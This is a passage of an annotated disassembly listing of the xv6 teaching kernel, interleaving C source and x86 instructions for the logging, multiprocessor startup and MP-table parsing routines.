log write_head(); // Write header to disk -- the real commit 80102c94: e8 b7 fd ff ff call 80102a50 <write_head> install_trans(); // Now install writes to home locations 80102c99: e8 12 fd ff ff call 801029b0 <install_trans> log.lh.n = 0; 80102c9e: c7 05 e8 26 11 80 00 movl $0x0,0x801126e8 80102ca5: 00 00 00 write_head(); // Erase the transaction from the log 80102ca8: e8 a3 fd ff ff call 80102a50 <write_head> if(do_commit){ // call commit w/o holding locks, since not allowed // to sleep with locks. commit(); acquire(&log.lock); 80102cad: 83 ec 0c sub $0xc,%esp 80102cb0: 68 a0 26 11 80 push $0x801126a0 80102cb5: e8 66 18 00 00 call 80104520 <acquire> log.committing = 0; wakeup(&log); 80102cba: c7 04 24 a0 26 11 80 movl $0x801126a0,(%esp) if(do_commit){ // call commit w/o holding locks, since not allowed // to sleep with locks. commit(); acquire(&log.lock); log.committing = 0; 80102cc1: c7 05 e0 26 11 80 00 movl $0x0,0x801126e0 80102cc8: 00 00 00 wakeup(&log); 80102ccb: e8 10 12 00 00 call 80103ee0 <wakeup> release(&log.lock); 80102cd0: c7 04 24 a0 26 11 80 movl $0x801126a0,(%esp) 80102cd7: e8 64 19 00 00 call 80104640 <release> 80102cdc: 83 c4 10 add $0x10,%esp } } 80102cdf: 8d 65 f4 lea -0xc(%ebp),%esp 80102ce2: 5b pop %ebx 80102ce3: 5e pop %esi 80102ce4: 5f pop %edi 80102ce5: 5d pop %ebp 80102ce6: c3 ret 80102ce7: 89 f6 mov %esi,%esi 80102ce9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi log.committing = 1; } else { // begin_op() may be waiting for log space, // and decrementing log.outstanding has decreased // the amount of reserved space. wakeup(&log); 80102cf0: 83 ec 0c sub $0xc,%esp 80102cf3: 68 a0 26 11 80 push $0x801126a0 80102cf8: e8 e3 11 00 00 call 80103ee0 <wakeup> } release(&log.lock); 80102cfd: c7 04 24 a0 26 11 80 movl $0x801126a0,(%esp) 80102d04: e8 37 19 00 00 call 80104640 <release> 80102d09: 83 c4 10 add $0x10,%esp acquire(&log.lock); log.committing = 0; wakeup(&log); release(&log.lock); } } 80102d0c: 8d 65 f4 lea -0xc(%ebp),%esp 80102d0f: 5b pop %ebx 80102d10: 5e pop %esi 80102d11: 5f pop %edi 80102d12: 5d pop %ebp 80102d13: c3 ret int do_commit = 0; acquire(&log.lock); log.outstanding -= 1; if(log.committing) panic("log.committing"); 80102d14: 83 ec 0c sub $0xc,%esp 80102d17: 68 44 76 10 80 push $0x80107644 80102d1c: e8 4f d6 ff ff call 80100370 <panic> 80102d21: eb 0d jmp 80102d30 <log_write> 80102d23: 90 nop 80102d24: 90 nop 80102d25: 90 nop 80102d26: 90 nop 80102d27: 90 nop 80102d28: 90 nop 80102d29: 90 nop 80102d2a: 90 nop 80102d2b: 90 nop 80102d2c: 90 nop 80102d2d: 90 nop 80102d2e: 90 nop 80102d2f: 90 nop 80102d30 <log_write>: // modify bp->data[] // log_write(bp) // brelse(bp) void log_write(struct buf *b) { 80102d30: 55 push %ebp 80102d31: 89 e5 mov %esp,%ebp 80102d33: 53 push %ebx 80102d34: 83 ec 04 sub $0x4,%esp int i; if (log.lh.n >= LOGSIZE || log.lh.n >= log.size - 1) 80102d37: 8b 15 e8 26 11 80 mov 0x801126e8,%edx // modify bp->data[] // log_write(bp) // brelse(bp) void log_write(struct buf *b) { 80102d3d: 8b 5d 08 mov 0x8(%ebp),%ebx int i; if (log.lh.n >= LOGSIZE || log.lh.n >= log.size - 1) 80102d40: 83 fa 1d cmp $0x1d,%edx 80102d43: 0f 8f 97 00 00 00 jg 80102de0 <log_write+0xb0> 80102d49: a1 d8 26 11 80 mov 0x801126d8,%eax 80102d4e: 83 e8 01 sub $0x1,%eax 80102d51: 39 c2 cmp %eax,%edx 80102d53: 0f 8d 87 00 00 00 jge 80102de0 <log_write+0xb0> panic("too big a transaction"); if (log.outstanding < 1) 80102d59: a1 dc 26 11 80 mov 0x801126dc,%eax 80102d5e: 85 c0 test %eax,%eax 80102d60: 0f 8e 87 00 00 00 jle 80102ded <log_write+0xbd> panic("log_write outside of trans"); acquire(&log.lock); 80102d66: 83 ec 0c sub $0xc,%esp 80102d69: 68 a0 26 11 80 push $0x801126a0 80102d6e: e8 ad 17 00 00 call 80104520 <acquire> for (i = 0; i < log.lh.n; i++) { 80102d73: 8b 15 e8 26 11 80 mov 0x801126e8,%edx 80102d79: 83 c4 10 add $0x10,%esp 80102d7c: 83 fa 00 cmp $0x0,%edx 80102d7f: 7e 50 jle 80102dd1 <log_write+0xa1> if (log.lh.block[i] == b->blockno) // log absorbtion 80102d81: 8b 4b 08 mov 0x8(%ebx),%ecx panic("too big a transaction"); if (log.outstanding < 1) panic("log_write outside of trans"); acquire(&log.lock); for (i = 0; i < log.lh.n; i++) { 80102d84: 31 c0 xor %eax,%eax if (log.lh.block[i] == b->blockno) // log absorbtion 80102d86: 3b 0d ec 26 11 80 cmp 0x801126ec,%ecx 80102d8c: 75 0b jne 80102d99 <log_write+0x69> 80102d8e: eb 38 jmp 80102dc8 <log_write+0x98> 80102d90: 39 0c 85 ec 26 11 80 cmp %ecx,-0x7feed914(,%eax,4) 80102d97: 74 2f je 80102dc8 <log_write+0x98> panic("too big a transaction"); if (log.outstanding < 1) panic("log_write outside of trans"); acquire(&log.lock); for (i = 0; i < log.lh.n; i++) { 80102d99: 83 c0 01 add $0x1,%eax 80102d9c: 39 d0 cmp %edx,%eax 80102d9e: 75 f0 jne 80102d90 <log_write+0x60> if (log.lh.block[i] == b->blockno) // log absorbtion break; } log.lh.block[i] = b->blockno; 80102da0: 89 0c 95 ec 26 11 80 mov %ecx,-0x7feed914(,%edx,4) if (i == log.lh.n) log.lh.n++; 80102da7: 83 c2 01 add $0x1,%edx 80102daa: 89 15 e8 26 11 80 mov %edx,0x801126e8 b->flags |= B_DIRTY; // prevent eviction 80102db0: 83 0b 04 orl $0x4,(%ebx) release(&log.lock); 80102db3: c7 45 08 a0 26 11 80 movl $0x801126a0,0x8(%ebp) } 80102dba: 8b 5d fc mov -0x4(%ebp),%ebx 80102dbd: c9 leave } log.lh.block[i] = b->blockno; if (i == log.lh.n) log.lh.n++; b->flags |= B_DIRTY; // prevent eviction release(&log.lock); 80102dbe: e9 7d 18 00 00 jmp 80104640 <release> 80102dc3: 90 nop 80102dc4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi acquire(&log.lock); for (i = 0; i < log.lh.n; i++) { if (log.lh.block[i] == b->blockno) // log absorbtion break; } log.lh.block[i] = b->blockno; 80102dc8: 89 0c 85 ec 26 11 80 mov %ecx,-0x7feed914(,%eax,4) 80102dcf: eb df jmp 80102db0 <log_write+0x80> 80102dd1: 8b 43 08 mov 0x8(%ebx),%eax 80102dd4: a3 ec 26 11 80 mov %eax,0x801126ec if (i == log.lh.n) 80102dd9: 75 d5 jne 80102db0 <log_write+0x80> 80102ddb: eb ca jmp 80102da7 <log_write+0x77> 80102ddd: 8d 76 00 lea 0x0(%esi),%esi log_write(struct buf *b) { int i; if (log.lh.n >= LOGSIZE || log.lh.n >= log.size - 1) panic("too big a transaction"); 80102de0: 83 ec 0c sub $0xc,%esp 80102de3: 68 53 76 10 80 push $0x80107653 80102de8: e8 83 d5 ff ff call 80100370 <panic> if (log.outstanding < 1) panic("log_write outside of trans"); 80102ded: 83 ec 0c sub $0xc,%esp 80102df0: 68 69 76 10 80 push $0x80107669 80102df5: e8 76 d5 ff ff call 80100370 <panic> 80102dfa: 66 90 xchg %ax,%ax 80102dfc: 66 90 xchg %ax,%ax 80102dfe: 66 90 xchg %ax,%ax 80102e00 <mpmain>: } // Common CPU setup code. static void mpmain(void) { 80102e00: 55 push %ebp 80102e01: 89 e5 mov %esp,%ebp 80102e03: 53 push %ebx 80102e04: 83 ec 04 sub $0x4,%esp cprintf("cpu%d: starting %d\n", cpuid(), cpuid()); 80102e07: e8 54 09 00 00 call 80103760 <cpuid> 80102e0c: 89 c3 mov %eax,%ebx 80102e0e: e8 4d 09 00 00 call 80103760 <cpuid> 80102e13: 83 ec 04 sub $0x4,%esp 80102e16: 53 push %ebx 80102e17: 50 push %eax 80102e18: 68 84 76 10 80 push $0x80107684 80102e1d: e8 3e d8 ff ff call 80100660 <cprintf> idtinit(); // load idt register 80102e22: e8 39 2b 00 00 call 80105960 <idtinit> xchg(&(mycpu()->started), 1); // tell startothers() we're up 80102e27: e8 b4 08 00 00 call 801036e0 <mycpu> 80102e2c: 89 c2 mov %eax,%edx xchg(volatile uint *addr, uint newval) { uint result; // The + in "+m" denotes a read-modify-write operand. asm volatile("lock; xchgl %0, %1" : 80102e2e: b8 01 00 00 00 mov $0x1,%eax 80102e33: f0 87 82 a0 00 00 00 lock xchg %eax,0xa0(%edx) scheduler(); // start running processes 80102e3a: e8 01 0c 00 00 call 80103a40 <scheduler> 80102e3f: 90 nop 80102e40 <mpenter>: } // Other CPUs jump here from entryother.S. static void mpenter(void) { 80102e40: 55 push %ebp 80102e41: 89 e5 mov %esp,%ebp 80102e43: 83 ec 08 sub $0x8,%esp switchkvm(); 80102e46: e8 35 3c 00 00 call 80106a80 <switchkvm> seginit(); 80102e4b: e8 30 3b 00 00 call 80106980 <seginit> lapicinit(); 80102e50: e8 9b f7 ff ff call 801025f0 <lapicinit> mpmain(); 80102e55: e8 a6 ff ff ff call 80102e00 <mpmain> 80102e5a: 66 90 xchg %ax,%ax 80102e5c: 66 90 xchg %ax,%ax 80102e5e: 66 90 xchg %ax,%ax 80102e60 <main>: // Bootstrap processor starts running C code here. // Allocate a real stack and switch to it, first // doing some setup required for memory allocator to work. int main(void) { 80102e60: 8d 4c 24 04 lea 0x4(%esp),%ecx 80102e64: 83 e4 f0 and $0xfffffff0,%esp 80102e67: ff 71 fc pushl -0x4(%ecx) 80102e6a: 55 push %ebp 80102e6b: 89 e5 mov %esp,%ebp 80102e6d: 53 push %ebx 80102e6e: 51 push %ecx // The linker has placed the image of entryother.S in // _binary_entryother_start. code = P2V(0x7000); memmove(code, _binary_entryother_start, (uint)_binary_entryother_size); for(c = cpus; c < cpus+ncpu; c++){ 80102e6f: bb a0 27 11 80 mov $0x801127a0,%ebx // Allocate a real stack and switch to it, first // doing some setup required for memory allocator to work. int main(void) { kinit1(end, P2V(4*1024*1024)); // phys page allocator 80102e74: 83 ec 08 sub $0x8,%esp 80102e77: 68 00 00 40 80 push $0x80400000 80102e7c: 68 b4 64 11 80 push $0x801164b4 80102e81: e8 3a f5 ff ff call 801023c0 <kinit1> kvmalloc(); // kernel page table 80102e86: e8 e5 40 00 00 call 80106f70 <kvmalloc> mpinit(); // detect other processors 80102e8b: e8 70 01 00 00 call 80103000 <mpinit> lapicinit(); // interrupt controller 80102e90: e8 5b f7 ff ff call 801025f0 <lapicinit> seginit(); // segment descriptors 80102e95: e8 e6 3a 00 00 call 80106980 <seginit> picinit(); // disable pic 80102e9a: e8 31 03 00 00 call 801031d0 <picinit> ioapicinit(); // another interrupt controller 80102e9f: e8 4c f3 ff ff call 801021f0 <ioapicinit> consoleinit(); // console hardware 80102ea4: e8 f7 da ff ff call 801009a0 <consoleinit> uartinit(); // serial port 80102ea9: e8 a2 2d 00 00 call 80105c50 <uartinit> pinit(); // process table 80102eae: e8 0d 08 00 00 call 801036c0 <pinit> tvinit(); // trap vectors 80102eb3: e8 08 2a 00 00 call 801058c0 <tvinit> binit(); // buffer cache 80102eb8: e8 83 d1 ff ff call 80100040 <binit> fileinit(); // file table 80102ebd: e8 8e de ff ff call 80100d50 <fileinit> ideinit(); // disk 80102ec2: e8 09 f1 ff ff call 80101fd0 <ideinit> // Write entry code to unused memory at 0x7000. // The linker has placed the image of entryother.S in // _binary_entryother_start. code = P2V(0x7000); memmove(code, _binary_entryother_start, (uint)_binary_entryother_size); 80102ec7: 83 c4 0c add $0xc,%esp 80102eca: 68 8a 00 00 00 push $0x8a 80102ecf: 68 8c a4 10 80 push $0x8010a48c 80102ed4: 68 00 70 00 80 push $0x80007000 80102ed9: e8 62 18 00 00 call 80104740 <memmove> for(c = cpus; c < cpus+ncpu; c++){ 80102ede: 69 05 20 2d 11 80 b0 imul $0xb0,0x80112d20,%eax 80102ee5: 00 00 00 80102ee8: 83 c4 10 add $0x10,%esp 80102eeb: 05 a0 27 11 80 add $0x801127a0,%eax 80102ef0: 39 d8 cmp %ebx,%eax 80102ef2: 76 6f jbe 80102f63 <main+0x103> 80102ef4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(c == mycpu()) // We've started already. 80102ef8: e8 e3 07 00 00 call 801036e0 <mycpu> 80102efd: 39 d8 cmp %ebx,%eax 80102eff: 74 49 je 80102f4a <main+0xea> continue; // Tell entryother.S what stack to use, where to enter, and what // pgdir to use. We cannot use kpgdir yet, because the AP processor // is running in low memory, so we use entrypgdir for the APs too. stack = kalloc(); 80102f01: e8 8a f5 ff ff call 80102490 <kalloc> *(void**)(code-4) = stack + KSTACKSIZE; 80102f06: 05 00 10 00 00 add $0x1000,%eax *(void**)(code-8) = mpenter; 80102f0b: c7 05 f8 6f 00 80 40 movl $0x80102e40,0x80006ff8 80102f12: 2e 10 80 *(int**)(code-12) = (void *) V2P(entrypgdir); 80102f15: c7 05 f4 6f 00 80 00 movl $0x109000,0x80006ff4 80102f1c: 90 10 00 // Tell entryother.S what stack to use, where to enter, and what // pgdir to use. We cannot use kpgdir yet, because the AP processor // is running in low memory, so we use entrypgdir for the APs too. stack = kalloc(); *(void**)(code-4) = stack + KSTACKSIZE; 80102f1f: a3 fc 6f 00 80 mov %eax,0x80006ffc *(void**)(code-8) = mpenter; *(int**)(code-12) = (void *) V2P(entrypgdir); lapicstartap(c->apicid, V2P(code)); 80102f24: 0f b6 03 movzbl (%ebx),%eax 80102f27: 83 ec 08 sub $0x8,%esp 80102f2a: 68 00 70 00 00 push $0x7000 80102f2f: 50 push %eax 80102f30: e8 0b f8 ff ff call 80102740 <lapicstartap> 80102f35: 83 c4 10 add $0x10,%esp 80102f38: 90 nop 80102f39: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi // wait for cpu to finish mpmain() while(c->started == 0) 80102f40: 8b 83 a0 00 00 00 mov 0xa0(%ebx),%eax 80102f46: 85 c0 test %eax,%eax 80102f48: 74 f6 je 80102f40 <main+0xe0> // The linker has placed the image of entryother.S in // _binary_entryother_start. code = P2V(0x7000); memmove(code, _binary_entryother_start, (uint)_binary_entryother_size); for(c = cpus; c < cpus+ncpu; c++){ 80102f4a: 69 05 20 2d 11 80 b0 imul $0xb0,0x80112d20,%eax 80102f51: 00 00 00 80102f54: 81 c3 b0 00 00 00 add $0xb0,%ebx 80102f5a: 05 a0 27 11 80 add $0x801127a0,%eax 80102f5f: 39 c3 cmp %eax,%ebx 80102f61: 72 95 jb 80102ef8 <main+0x98> tvinit(); // trap vectors binit(); // buffer cache fileinit(); // file table ideinit(); // disk startothers(); // start other processors kinit2(P2V(4*1024*1024), P2V(PHYSTOP)); // must come after startothers() 80102f63: 83 ec 08 sub $0x8,%esp 80102f66: 68 00 00 00 8e push $0x8e000000 80102f6b: 68 00 00 40 80 push $0x80400000 80102f70: e8 bb f4 ff ff call 80102430 <kinit2> userinit(); // first user process 80102f75: e8 36 08 00 00 call 801037b0 <userinit> mpmain(); // finish this processor's setup 80102f7a: e8 81 fe ff ff call 80102e00 <mpmain> 80102f7f: 90 nop 80102f80 <mpsearch1>: } // Look for an MP structure in the len bytes at addr. static struct mp* mpsearch1(uint a, int len) { 80102f80: 55 push %ebp 80102f81: 89 e5 mov %esp,%ebp 80102f83: 57 push %edi 80102f84: 56 push %esi uchar *e, *p, *addr; addr = P2V(a); 80102f85: 8d b0 00 00 00 80 lea -0x80000000(%eax),%esi } // Look for an MP structure in the len bytes at addr. static struct mp* mpsearch1(uint a, int len) { 80102f8b: 53 push %ebx uchar *e, *p, *addr; addr = P2V(a); e = addr+len; 80102f8c: 8d 1c 16 lea (%esi,%edx,1),%ebx } // Look for an MP structure in the len bytes at addr. static struct mp* mpsearch1(uint a, int len) { 80102f8f: 83 ec 0c sub $0xc,%esp uchar *e, *p, *addr; addr = P2V(a); e = addr+len; for(p = addr; p < e; p += sizeof(struct mp)) 80102f92: 39 de cmp %ebx,%esi 80102f94: 73 48 jae 80102fde <mpsearch1+0x5e> 80102f96: 8d 76 00 lea 0x0(%esi),%esi 80102f99: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi if(memcmp(p, "_MP_", 4) == 0 && sum(p, sizeof(struct mp)) == 0) 80102fa0: 83 ec 04 sub $0x4,%esp 80102fa3: 8d 7e 10 lea 0x10(%esi),%edi 80102fa6: 6a 04 push $0x4 80102fa8: 68 98 76 10 80 push $0x80107698 80102fad: 56 push %esi 80102fae: e8 2d 17 00 00 call 801046e0 <memcmp> 80102fb3: 83 c4 10 add $0x10,%esp 80102fb6: 85 c0 test %eax,%eax 80102fb8: 75 1e jne 80102fd8 <mpsearch1+0x58> 80102fba: 8d 7e 10 lea 0x10(%esi),%edi 80102fbd: 89 f2 mov %esi,%edx 80102fbf: 31 c9 xor %ecx,%ecx 80102fc1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi { int i, sum; sum = 0; for(i=0; i<len; i++) sum += addr[i]; 80102fc8: 0f b6 02 movzbl (%edx),%eax 80102fcb: 83 c2 01 add $0x1,%edx 80102fce: 01 c1 add %eax,%ecx sum(uchar *addr, int len) { int i, sum; sum = 0; for(i=0; i<len; i++) 80102fd0: 39 fa cmp %edi,%edx 80102fd2: 75 f4 jne 80102fc8 <mpsearch1+0x48> uchar *e, *p, *addr; addr = P2V(a); e = addr+len; for(p = addr; p < e; p += sizeof(struct mp)) if(memcmp(p, "_MP_", 4) == 0 && sum(p, sizeof(struct mp)) == 0) 80102fd4: 84 c9 test %cl,%cl 80102fd6: 74 10 je 80102fe8 <mpsearch1+0x68> { uchar *e, *p, *addr; addr = P2V(a); e = addr+len; for(p = addr; p < e; p += sizeof(struct mp)) 80102fd8: 39 fb cmp %edi,%ebx 80102fda: 89 fe mov %edi,%esi 80102fdc: 77 c2 ja 80102fa0 <mpsearch1+0x20> if(memcmp(p, "_MP_", 4) == 0 && sum(p, sizeof(struct mp)) == 0) return (struct mp*)p; return 0; } 80102fde: 8d 65 f4 lea -0xc(%ebp),%esp addr = P2V(a); e = addr+len; for(p = addr; p < e; p += sizeof(struct mp)) if(memcmp(p, "_MP_", 4) == 0 && sum(p, sizeof(struct mp)) == 0) return (struct mp*)p; return 0; 80102fe1: 31 c0 xor %eax,%eax } 80102fe3: 5b pop %ebx 80102fe4: 5e pop %esi 80102fe5: 5f pop %edi 80102fe6: 5d pop %ebp 80102fe7: c3 ret 80102fe8: 8d 65 f4 lea -0xc(%ebp),%esp 80102feb: 89 f0 mov %esi,%eax 80102fed: 5b pop %ebx 80102fee: 5e pop %esi 80102fef: 5f pop %edi 80102ff0: 5d pop %ebp 80102ff1: c3 ret 80102ff2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 80102ff9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80103000 <mpinit>: return conf; } void mpinit(void) { 80103000: 55 push %ebp 80103001: 89 e5 mov %esp,%ebp 80103003: 57 push %edi 80103004: 56 push %esi 80103005: 53 push %ebx 80103006: 83 ec 1c sub $0x1c,%esp uchar *bda; uint p; struct mp *mp; bda = (uchar *) P2V(0x400); if((p = ((bda[0x0F]<<8)| bda[0x0E]) << 4)){ 80103009: 0f b6 05 0f 04 00 80 movzbl 0x8000040f,%eax 80103010: 0f b6 15 0e 04 00 80 movzbl 0x8000040e,%edx 80103017: c1 e0 08 shl $0x8,%eax 8010301a: 09 d0 or %edx,%eax 8010301c: c1 e0 04 shl $0x4,%eax 8010301f: 85 c0 test %eax,%eax 80103021: 75 1b jne 8010303e <mpinit+0x3e> if((mp = mpsearch1(p, 1024))) return mp; } else { p = ((bda[0x14]<<8)|bda[0x13])*1024; if((mp = mpsearch1(p-1024, 1024))) 80103023: 0f b6 05 14 04 00 80 movzbl 0x80000414,%eax 8010302a: 0f b6 15 13 04 00 80 movzbl 0x80000413,%edx 80103031: c1 e0 08 shl $0x8,%eax 80103034: 09 d0 or %edx,%eax 80103036: c1 e0 0a shl $0xa,%eax 80103039: 2d 00 04 00 00 sub $0x400,%eax uint p; struct mp *mp; bda = (uchar *) P2V(0x400); if((p = ((bda[0x0F]<<8)| bda[0x0E]) << 4)){ if((mp = mpsearch1(p, 1024))) 8010303e: ba 00 04 00 00 mov $0x400,%edx 80103043: e8 38 ff ff ff call 80102f80 <mpsearch1> 80103048: 85 c0 test %eax,%eax 8010304a: 89 45 e4 mov %eax,-0x1c(%ebp) 8010304d: 0f 84 37 01 00 00 je 8010318a <mpinit+0x18a> mpconfig(struct mp **pmp) { struct mpconf *conf; struct mp *mp; if((mp = mpsearch()) == 0 || mp->physaddr == 0) 80103053: 8b 45 e4 mov -0x1c(%ebp),%eax 80103056: 8b 58 04 mov 0x4(%eax),%ebx 80103059: 85 db test %ebx,%ebx 8010305b: 0f 84 43 01 00 00 je 801031a4 <mpinit+0x1a4> return 0; conf = (struct mpconf*) P2V((uint) mp->physaddr); 80103061: 8d b3 00 00 00 80 lea -0x80000000(%ebx),%esi if(memcmp(conf, "PCMP", 4) != 0) 80103067: 83 ec 04 sub $0x4,%esp 8010306a: 6a 04 push $0x4 8010306c: 68 9d 76 10 80 push $0x8010769d 80103071: 56 push %esi 80103072: e8 69 16 00 00 call 801046e0 <memcmp> 80103077: 83 c4 10 add $0x10,%esp 8010307a: 85 c0 test %eax,%eax 8010307c: 0f 85 22 01 00 00 jne 801031a4 <mpinit+0x1a4> return 0; if(conf->version != 1 && conf->version != 4) 80103082: 0f b6 83 06 00 00 80 movzbl -0x7ffffffa(%ebx),%eax 80103089: 3c 01 cmp $0x1,%al 8010308b: 74 08 je 80103095 <mpinit+0x95> 8010308d: 3c 04 cmp $0x4,%al 8010308f: 0f 85 0f 01 00 00 jne 801031a4 <mpinit+0x1a4> return 0; if(sum((uchar*)conf, conf->length) != 0) 80103095: 0f b7 bb 04 00 00 80 movzwl -0x7ffffffc(%ebx),%edi sum(uchar *addr, int len) { int i, sum; sum = 0; for(i=0; i<len; i++) 8010309c: 85 ff test %edi,%edi 8010309e: 74 21 je 801030c1 <mpinit+0xc1> 801030a0: 31 d2 xor %edx,%edx 801030a2: 31 c0 xor %eax,%eax 801030a4: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi sum += addr[i]; 801030a8: 0f b6 8c 03 00 00 00 movzbl -0x80000000(%ebx,%eax,1),%ecx 801030af: 80 sum(uchar *addr, int len) { int i, sum; sum = 0; for(i=0; i<len; i++) 801030b0: 83 c0 01 add $0x1,%eax sum += addr[i]; 801030b3: 01 ca add %ecx,%edx sum(uchar *addr, int len) { int i, sum; sum = 0; for(i=0; i<len; i++) 801030b5: 39 c7 cmp %eax,%edi 801030b7: 75 ef jne 801030a8 <mpinit+0xa8> conf = (struct mpconf*) P2V((uint) mp->physaddr); if(memcmp(conf, "PCMP", 4) != 0) return 0; if(conf->version != 1 && conf->version != 4) return 0; if(sum((uchar*)conf, conf->length) != 0) 801030b9: 84 d2 test %dl,%dl 801030bb: 0f 85 e3 00 00 00 jne 801031a4 <mpinit+0x1a4> struct mp *mp; struct mpconf *conf; struct mpproc *proc; struct mpioapic *ioapic; if((conf = mpconfig(&mp)) == 0) 801030c1: 85 f6 test %esi,%esi 801030c3: 0f 84 db 00 00 00 je 801031a4 <mpinit+0x1a4> panic("Expect to run on an SMP"); ismp = 1; lapic = (uint*)conf->lapicaddr; 801030c9: 8b 83 24 00 00 80 mov -0x7fffffdc(%ebx),%eax 801030cf: a3 9c 26 11 80 mov %eax,0x8011269c for(p=(uchar*)(conf+1), e=(uchar*)conf+conf->length; p<e; ){ 801030d4: 0f b7 93 04 00 00 80 movzwl -0x7ffffffc(%ebx),%edx 801030db: 8d 83 2c 00 00 80 lea -0x7fffffd4(%ebx),%eax struct mpproc *proc; struct mpioapic *ioapic; if((conf = mpconfig(&mp)) == 0) panic("Expect to run on an SMP"); ismp = 1; 801030e1: bb 01 00 00 00 mov $0x1,%ebx lapic = (uint*)conf->lapicaddr; for(p=(uchar*)(conf+1), e=(uchar*)conf+conf->length; p<e; ){ 801030e6: 01 d6 add %edx,%esi 801030e8: 90 nop 801030e9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801030f0: 39 c6 cmp %eax,%esi 801030f2: 76 23 jbe 80103117 <mpinit+0x117> 801030f4: 0f b6 10 movzbl (%eax),%edx switch(*p){ 801030f7: 80 fa 04 cmp $0x4,%dl 801030fa: 0f 87 c0 00 00 00 ja 801031c0 <mpinit+0x1c0> 80103100: ff 24 95 dc 76 10 80 jmp *-0x7fef8924(,%edx,4) 80103107: 89 f6 mov %esi,%esi 80103109: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi p += sizeof(struct mpioapic); continue; case MPBUS: case MPIOINTR: case MPLINTR: p += 8; 80103110: 83 c0 08 add $0x8,%eax if((conf = mpconfig(&mp)) == 0) panic("Expect to run on an SMP"); ismp = 1; lapic = (uint*)conf->lapicaddr; for(p=(uchar*)(conf+1), e=(uchar*)conf+conf->length; p<e; ){ 80103113: 39 c6 cmp %eax,%esi 80103115: 77 dd ja 801030f4 <mpinit+0xf4> default: ismp = 0; break; } } if(!ismp) 80103117: 85 db test %ebx,%ebx 80103119: 0f 84 92 00 00 00 je 801031b1 <mpinit+0x1b1> panic("Didn't find a suitable machine"); if(mp->imcrp){ 8010311f: 8b 45 e4 mov -0x1c(%ebp),%eax 80103122: 80 78 0c 00 cmpb $0x0,0xc(%eax) 80103126: 74 15 je 8010313d <mpinit+0x13d> } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80103128: ba 22 00 00 00 mov $0x22,%edx 8010312d: b8 70 00 00 00 mov $0x70,%eax 80103132: ee out %al,(%dx) static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80103133: ba 23 00 00 00 mov $0x23,%edx 80103138: ec in (%dx),%al } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80103139: 83 c8 01 or $0x1,%eax 8010313c: ee out %al,(%dx) // Bochs doesn't support IMCR, so this doesn't run on Bochs. // But it would on real hardware. outb(0x22, 0x70); // Select IMCR outb(0x23, inb(0x23) | 1); // Mask external interrupts. } } 8010313d: 8d 65 f4 lea -0xc(%ebp),%esp 80103140: 5b pop %ebx 80103141: 5e pop %esi 80103142: 5f pop %edi 80103143: 5d pop %ebp 80103144: c3 ret 80103145: 8d 76 00 lea 0x0(%esi),%esi lapic = (uint*)conf->lapicaddr; for(p=(uchar*)(conf+1), e=(uchar*)conf+conf->length; p<e; ){ switch(*p){ case MPPROC: proc = (struct mpproc*)p; if(ncpu < NCPU) { 80103148: 8b 0d 20 2d 11 80 mov 0x80112d20,%ecx 8010314e: 83 f9 07 cmp $0x7,%ecx 80103151: 7f 19 jg 8010316c <mpinit+0x16c> cpus[ncpu].apicid = proc->apicid; // apicid may differ from ncpu 80103153: 0f b6 50 01 movzbl 0x1(%eax),%edx 80103157: 69 f9 b0 00 00 00 imul $0xb0,%ecx,%edi ncpu++; 8010315d: 83 c1 01 add $0x1,%ecx 80103160: 89 0d 20 2d 11 80 mov %ecx,0x80112d20 for(p=(uchar*)(conf+1), e=(uchar*)conf+conf->length; p<e; ){ switch(*p){ case MPPROC: proc = (struct mpproc*)p; if(ncpu < NCPU) { cpus[ncpu].apicid = proc->apicid; // apicid may differ from ncpu 80103166: 88 97 a0 27 11 80 mov %dl,-0x7feed860(%edi) ncpu++; } p += sizeof(struct mpproc); 8010316c: 83 c0 14 add $0x14,%eax continue; 8010316f: e9 7c ff ff ff jmp 801030f0 <mpinit+0xf0> 80103174: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi case MPIOAPIC: ioapic = (struct mpioapic*)p; ioapicid = ioapic->apicno; 80103178: 0f b6 50 01 movzbl 0x1(%eax),%edx p += sizeof(struct mpioapic); 8010317c: 83 c0 08 add $0x8,%eax } p += sizeof(struct mpproc); continue; case MPIOAPIC: ioapic = (struct mpioapic*)p; ioapicid = ioapic->apicno; 8010317f: 88 15 80 27 11 80 mov %dl,0x80112780 p += sizeof(struct mpioapic); continue; 80103185: e9 66 ff ff ff jmp 801030f0 <mpinit+0xf0> } else { p = ((bda[0x14]<<8)|bda[0x13])*1024; if((mp = mpsearch1(p-1024, 1024))) return mp; } return mpsearch1(0xF0000, 0x10000); 8010318a: ba 00 00 01 00 mov $0x10000,%edx 8010318f: b8 00 00 0f 00 mov $0xf0000,%eax 80103194: e8 e7 fd ff ff call 80102f80 <mpsearch1> mpconfig(struct mp **pmp) { struct mpconf *conf; struct mp *mp; if((mp = mpsearch()) == 0 || mp->physaddr == 0) 80103199: 85 c0 test %eax,%eax } else { p = ((bda[0x14]<<8)|bda[0x13])*1024; if((mp = mpsearch1(p-1024, 1024))) return mp; } return mpsearch1(0xF0000, 0x10000); 8010319b: 89 45 e4 mov %eax,-0x1c(%ebp) mpconfig(struct mp **pmp) { struct mpconf *conf; struct mp *mp; if((mp = mpsearch()) == 0 || mp->physaddr == 0) 8010319e: 0f 85 af fe ff ff jne 80103053 <mpinit+0x53> struct mpconf *conf; struct mpproc *proc; struct mpioapic *ioapic; if((conf = mpconfig(&mp)) == 0) panic("Expect to run on an SMP"); 801031a4: 83 ec 0c sub $0xc,%esp 801031a7: 68 a2 76 10 80 push $0x801076a2 801031ac: e8 bf d1 ff ff call 